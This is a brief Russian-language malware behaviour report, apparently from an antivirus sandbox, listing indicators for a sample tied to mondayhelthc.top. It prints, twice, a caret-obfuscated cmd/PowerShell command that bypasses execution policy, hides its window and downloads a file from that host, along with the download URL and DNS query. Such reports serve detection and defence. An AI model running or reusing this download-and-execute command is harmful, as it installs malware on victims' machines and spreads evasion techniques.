Техническая информация
- http://mondayhelthc.top/read.php?f=0.dat как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /C "P^oW^E^r^shelL.eXE ^-E^x^EC^U^tIonP^olIcy b^YPA^SS ^-N^oprOfI^Le -w^indOws^TylE^ hI^dD^eN ^(NEW^-^OBjeCT^ SYs^Te^M.NEt^.^WEbC^lIEN^T).DoW^Nl^O^A^dFiLE^(^'http://mondayhelt...
- DNS ASK mo####helthc.top
- '<SYSTEM32>\cmd.exe' /C "P^oW^E^r^shelL.eXE ^-E^x^EC^U^tIonP^olIcy b^YPA^SS ^-N^oprOfI^Le -w^indOws^TylE^ hI^dD^eN ^(NEW^-^OBjeCT^ SYs^Te^M.NEt^.^WEbC^lIEN^T).DoW^Nl^O^A^dFiLE^(^'http://mondayhelt...' (со скрытым окном)